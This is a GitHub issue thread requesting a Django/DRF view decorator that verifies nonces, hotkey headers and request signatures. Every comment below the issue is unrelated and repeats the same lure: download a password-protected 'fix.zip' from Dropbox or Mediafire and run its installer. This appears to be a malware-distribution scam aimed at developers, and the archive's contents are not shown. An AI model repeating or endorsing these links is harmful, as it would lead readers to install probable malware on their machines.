### ISSUE TITLE
authentication view decorator for django/drf views

### ISSUE THREAD

**Issue by ppolewicz** [bactensor/auto-validator#26]
Will accept requests from clients only if the request contains:
- correct nonce (timestamp with high precision, not too new and not too old)
- hotkey specified in the headers
- signature of the request including method, url, content and headers (except the signature header), is provided in the signature header
- the signature is generated with this method https://github.com/opentensor/bittensor/pull/2201/files#diff-24cc59bd689f1ebdabe7fec15d6955cd9ddf00bd1343c2a961c3a5ae63847449R1144
- the verification function, from what I heard, already was in the `bittensor` package

Handed off with a 2h estimate to `Rovertter [τ, τ]`  on EU afternoon of 2024-08-23

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
